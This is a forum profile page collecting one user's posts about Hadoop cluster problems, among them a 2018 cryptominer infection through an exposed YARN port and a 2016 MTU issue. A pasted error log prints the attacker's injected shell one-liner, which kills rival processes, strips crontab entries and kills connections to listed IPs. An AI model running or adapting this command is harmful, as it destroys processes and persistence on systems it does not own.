Member since
05-02-2016
19
Posts
1
Kudos Received
1
Solution
My Accepted Solutions
Title | Views | Posted |
---|---|---|
4469 | 08-16-2018 02:43 PM |
08-17-2018
07:03 AM
Confirmed. This was the issue. Closing the firewall to port 8088 from outside traffic kept this from happening again, along with removing the rogue cron entry in the yarn user's crontab file, and killing those yarn processes. Chris
... View more
08-16-2018
02:43 PM
Yup. Looks like this is the culprit: https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html I found an entry in the security group that needed updating. I'm thinking this will fix the problem. Will post back one more time with a confirmation.
... View more
08-16-2018
02:33 PM
More info: I found this: https://community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html which is exactly what is happening to me. Apparently my Security Groups in AWS need to be tightened somehow? I'm not sure how this is happening...yet.
... View more
08-16-2018
02:15 PM
Sorry, I should have also mentioned that I did verify that port 2049 is not blocked at the firewall with the unix "nc" command. Also, interesting enough, even after stopping the YARN service in CM, the jobs kept spawing. I inspected the process that's running, and it's an odd one (to me): yarn 28333 1 99 19:59 ? 09:47:22 /var/tmp/java -c /var/tmp/w.conf I don't know why there is a "java" in var/tmp, and there was no "w.conf" file there either. The mystery continues...
... View more
08-16-2018
02:07 PM
Hi everyone, I'm fairly familiar with Cloudera Hadoop, but this one is stumping me. I installed a fresh copy of CM 5.15.0 on newly provisioned hardware today: Version: Cloudera Express 5.15.0 Java VM Name: Java HotSpot(TM) 64-Bit Server VM Java VM Vendor: Oracle Corporation Java Version: 1.7.0_67 It's running CDH5 version: 5.15.0-1.cdh5.15.0.p0.21 When I spun up the cluster, I noticed that the Cluster CPU was pegged at 100%. Odd, since nothing should be running here yet. A quick look at "top" on the datanodes showed yarn processes on each taking tons of CPU: top - 20:57:28 up 3:20, 1 user, load average: 39.26, 39.38, 38.46 Tasks: 408 total, 1 running, 407 sleeping, 0 stopped, 0 zombie Cpu(s): 28.6%us, 0.2%sy, 0.0%ni, 71.2%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Mem: 30794896k total, 4898532k used, 25896364k free, 123248k buffers Swap: 0k total, 0k used, 0k free, 2963828k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 26355 yarn 20 0 391m 27m 584 S 549.0 0.1 303:19.37 java 26273 yarn 20 0 391m 27m 588 S 515.6 0.1 303:23.67 java 26313 yarn 20 0 391m 27m 584 S 512.9 0.1 303:33.08 java These are 16 core servers, so a load average of 39.26 is crazy high. I then checked the YARN -> Applications tab in CM, and there are ~40 jobs a minute being spawned and failing with this info: ID: application_1534449578775_0528 Type: YARN User: dr.who Pool: root.users.dr_dot_who Duration: 25.9s Allocated Memory Seconds: 10.5K Allocated VCore Seconds: 10 Every one of them has this error under "Application Details" ================================================================= Application application_1534449578775_0528 failed 2 times due to AM Container for appattempt_1534449578775_0528_000002 exited with exitCode: 123 For more detailed output, check application tracking page:http://bddevh01.dbhotelcloud.com:8088/proxy/application_1534449578775_0528/Then, click on links to logs of each attempt. Diagnostics: Exception from container-launch. Container id: container_1534449578775_0528_02_000001 Exit code: 123 Exception message: bash: no job control in this shell bash-4.1$ for i in {1..60}; do ps ax|grep ff.sh|awk '{print $1}'|xargs ps -o ppi d=|xargs kill -9; done;pgrep -f "sh \./a[[:digit:]]{1,}$"|xargs kill -9;ps ax|gr ep "./no1\|sssshd\|terty\|asdfsd\|qwefdas\|piois"|grep -v grep | awk '{print $1} ' | xargs kill -9;ps ax|grep "./uiiu"|grep -v grep | awk '{print $1}' | xargs ki ll -9;ps ax|grep "./noda\|./manager"|grep sh|grep -v grep | awk '{print $1}' | x args kill -9;ps ax|grep "./noss"|grep -v grep | awk '{print $1}' | xargs kill -9 ;crontab -l | sed '/tmp/d' | crontab -;crontab -l | sed '/jpg/d' | crontab -;cro ntab -l | sed '/png/d' | crontab -;netstat -antp | grep '158.69.133.20\|192.99.1 42.249\|202.144.193.110\|192.99.142.225\|192.99.142.246\|46.4.200.177\|192.99.14 2.250\|46.4.200.179\|192.99.142.251\|46.4.200.178\|159.65.202.177\|185.92.223.19 0\|222.187.232.9' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] usage: kill [ -s signal | -p ] [ -a ] pid ... <snip> kill -l [ signal ] (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] bash-4.1$ exit at org.apache.hadoop.util.Shell.runCommand(Shell.java:604) at org.apache.hadoop.util.Shell.run(Shell.java:507) at org.apache.hadoop.util.Shell$ShellCommandExecutor.execute(Shell.java:789) at org.apache.hadoop.yarn.server.nodemanager.DefaultContainerExecutor.launchContainer(DefaultContainerExecutor.java:213) at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:302) at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:82) at java.util.concurrent.FutureTask.run(FutureTask.java:262) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) at java.lang.Thread.run(Thread.java:745) Container exited with a non-zero exit code 123 Failing this attempt. Failing the application. ================================================================= Does anyone know what this job is, or why it is getting this exception: Exception message: bash: no job control in this shell I've googled that error, but the results haven't led me in a direction that I can determine the root cause here. Thank you SO MUCH for your time and suggestions... Chris
... View more
Labels:
- Labels:
-
Apache YARN
-
Cloudera Manager
05-07-2016
11:39 AM
Just one last reply to confirm that an improper switch configuration was the issue here. Once that was fixed, everything worked great! Thanks again for all the help. Chris
... View more
05-03-2016
05:33 PM
Well, it seems the network guy has gone home for the day, so I set all the MTUs to 1500 between the CM server host and one agent server, and everything is working great. 🙂 🙂 Michalis, thank you again for taking the time to read my extra long posts and get me past this issue. I'll have the network guy check the switches and firewall configuration and find out where the problem is ASAP tomorrow. One more post back telling what the final issue ends up being. Thanks again. Chris
... View more
05-03-2016
02:57 PM
Ahhh....I think you are on to something for sure! </happy_dance> chris.neal@bdprodm09:[65]:~> ping -M do -s 8972 172.0.30.2
PING 172.0.30.2 (172.0.30.2) 8972(9000) bytes of data.
^C
--- 172.0.30.2 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1574ms I'm going to ping our network guy and have him validate the switch configurations. Thank you thank you thank you. 🙂 I'll report back soon, I hope! Chris
... View more
05-03-2016
02:28 PM
Thanks again 🙂 It's a bonded 4x10Gb with an MTU of 9000. bond0 Link encap:Ethernet HWaddr A0:36:9F:96:76:F4
inet addr:172.0.30.2 Bcast:172.0.30.255 Mask:255.255.255.0
inet6 addr: fe80::a236:9fff:fe96:76f4/64 Scope:Link
UP BROADCAST RUNNING MASTER MULTICAST MTU:9000 Metric:1
RX packets:8750 errors:0 dropped:0 overruns:0 frame:0
TX packets:1500 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:616956 (602.4 KiB) TX bytes:259076 (253.0 KiB) Chris
... View more
05-03-2016
01:55 PM
Thanks for the reply Michalis! /tmp is 777: root@bdprodm10:[134]:/tmp> ls -la
total 203756
drwxrwxrwt. 14 root root 4096 May 3 20:41 . I noticed on a working CM install that the next step in the install process is a CHMOD step that I never reach, because the COPY step never completes. I think that is why the permissions are 644 on the .sh file, and 700 on the directory itself: root@bdprodm10:[136]:/tmp> ls -l | grep scm_prepare_node.mWfGt4sr
drwx------ 2 cminstall cminstall 4096 May 3 20:22 scm_prepare_node.mWfGt4sr
root@bdprodm10:[137]:/tmp> ls -l scm_prepare_node.mWfGt4sr
total 0
-rw-r--r-- 1 cminstall cminstall 0 May 3 20:22 scm_prepare_node.sh Again, thank you for your help!
... View more